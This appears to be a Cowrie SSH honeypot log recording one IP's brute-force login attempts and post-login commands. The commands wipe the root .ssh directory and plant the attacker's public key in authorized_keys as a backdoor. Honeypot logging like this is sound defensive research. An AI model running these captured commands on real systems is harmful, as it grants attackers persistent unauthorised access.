{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:07:41.866494Z","src_ip":"212.227.235.229","session":"9276e43071b3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:07:42.629743Z","src_ip":"212.227.235.229","session":"9276e43071b3"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:07:43.811954Z","src_ip":"212.227.235.229","session":"9276e43071b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46996,"dst_ip":"1.2.3.4","dst_port":22,"session":"799d0a6a940b","protocol":"ssh","message":"New connection: 212.227.235.229:46996 (1.2.3.4:22) [session: 799d0a6a940b]","sensor":"my-vps","timestamp":"2025-09-08T22:07:43.970016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:07:43.971026Z","src_ip":"212.227.235.229","session":"799d0a6a940b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:07:44.138318Z","src_ip":"212.227.235.229","session":"799d0a6a940b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:07:44.848607Z","src_ip":"212.227.235.229","session":"799d0a6a940b"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:07:45.018412Z","src_ip":"212.227.235.229","session":"799d0a6a940b"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:07:45.024881Z","src_ip":"212.227.235.229","session":"b8f0a4d3509d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42814,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f2236f69000","protocol":"ssh","message":"New connection: 212.227.235.229:42814 (1.2.3.4:22) [session: 5f2236f69000]","sensor":"my-vps","timestamp":"2025-09-08T22:07:50.005858Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:07:50.006786Z","src_ip":"212.227.235.229","session":"5f2236f69000"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:07:50.337476Z","src_ip":"212.227.235.229","session":"5f2236f69000"}
{"eventid":"cowrie.login.failed","username":"hack","password":"1234567890","message":"login attempt [hack/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T22:07:51.706779Z","src_ip":"212.227.235.229","session":"5f2236f69000"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:07:53.040912Z","src_ip":"212.227.235.229","session":"5f2236f69000"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42680,"dst_ip":"1.2.3.4","dst_port":22,"session":"38ca058a2c4a","protocol":"ssh","message":"New connection: 212.227.235.229:42680 (1.2.3.4:22) [session: 38ca058a2c4a]","sensor":"my-vps","timestamp":"2025-09-08T22:07:56.395760Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:07:56.457689Z","src_ip":"212.227.235.229","session":"38ca058a2c4a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:07:56.877156Z","src_ip":"212.227.235.229","session":"38ca058a2c4a"}
{"eventid":"cowrie.login.failed","username":"anonymous","password":"2025","message":"login attempt [anonymous/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T22:07:57.688627Z","src_ip":"212.227.235.229","session":"38ca058a2c4a"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:07:58.544206Z","src_ip":"212.227.235.229","session":"c6a001334f97"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:07:58.893650Z","src_ip":"212.227.235.229","session":"38ca058a2c4a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46718,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2d894818eeb","protocol":"ssh","message":"New connection: 212.227.235.229:46718 (1.2.3.4:22) [session: f2d894818eeb]","sensor":"my-vps","timestamp":"2025-09-08T22:08:04.860376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:08:04.861357Z","src_ip":"212.227.235.229","session":"f2d894818eeb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44178,"dst_ip":"1.2.3.4","dst_port":22,"session":"548aaba9d01c","protocol":"ssh","message":"New connection: 212.227.235.229:44178 (1.2.3.4:22) [session: 548aaba9d01c]","sensor":"my-vps","timestamp":"2025-09-08T22:08:05.071221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:08:05.072163Z","src_ip":"212.227.235.229","session":"548aaba9d01c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:08:05.195437Z","src_ip":"212.227.235.229","session":"f2d894818eeb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:08:05.362386Z","src_ip":"212.227.235.229","session":"548aaba9d01c"}
{"eventid":"cowrie.login.success","username":"root","password":"qweASD123!@#","message":"login attempt [root/qweASD123!@#] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:08:06.560517Z","src_ip":"212.227.235.229","session":"f2d894818eeb"}
{"eventid":"cowrie.login.success","username":"root","password":"0.0.0.0.","message":"login attempt [root/0.0.0.0.] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:08:06.562413Z","src_ip":"212.227.235.229","session":"548aaba9d01c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:08:07.200775Z","src_ip":"212.227.235.229","session":"548aaba9d01c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:08:07.201532Z","src_ip":"212.227.235.229","session":"548aaba9d01c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:08:07.202324Z","src_ip":"212.227.235.229","session":"548aaba9d01c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43718,"dst_ip":"1.2.3.4","dst_port":22,"session":"46a479c7c4d0","protocol":"ssh","message":"New connection: 212.227.235.229:43718 (1.2.3.4:22) [session: 46a479c7c4d0]","sensor":"my-vps","timestamp":"2025-09-08T22:08:07.218718Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:08:07.234810Z","src_ip":"212.227.235.229","session":"f2d894818eeb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:08:07.235446Z","src_ip":"212.227.235.229","session":"f2d894818eeb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:08:07.237871Z","src_ip":"212.227.235.229","session":"f2d894818eeb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:07.493530Z","src_ip":"212.227.235.229","session":"548aaba9d01c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:07.569799Z","src_ip":"212.227.235.229","session":"f2d894818eeb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:08:08.130767Z","src_ip":"212.227.235.229","session":"548aaba9d01c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:08:08.131430Z","src_ip":"212.227.235.229","session":"548aaba9d01c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:08:08.333923Z","src_ip":"212.227.235.229","session":"f2d894818eeb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:08:08.334582Z","src_ip":"212.227.235.229","session":"f2d894818eeb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:08:08.423698Z","src_ip":"212.227.235.229","session":"548aaba9d01c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:08.424564Z","src_ip":"212.227.235.229","session":"548aaba9d01c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:08:08.668407Z","src_ip":"212.227.235.229","session":"f2d894818eeb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:08.669245Z","src_ip":"212.227.235.229","session":"f2d894818eeb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41092,"dst_ip":"1.2.3.4","dst_port":22,"session":"181c3a74f08b","protocol":"ssh","message":"New connection: 212.227.235.229:41092 (1.2.3.4:22) [session: 181c3a74f08b]","sensor":"my-vps","timestamp":"2025-09-08T22:08:08.720976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:08:08.721764Z","src_ip":"212.227.235.229","session":"181c3a74f08b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:08:08.810508Z","src_ip":"212.227.235.229","session":"46a479c7c4d0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:08:08.811199Z","src_ip":"212.227.235.229","session":"46a479c7c4d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40522,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4e0bfa94976","protocol":"ssh","message":"New connection: 212.227.235.229:40522 (1.2.3.4:22) [session: c4e0bfa94976]","sensor":"my-vps","timestamp":"2025-09-08T22:08:08.992995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:08:08.994115Z","src_ip":"212.227.235.229","session":"c4e0bfa94976"}
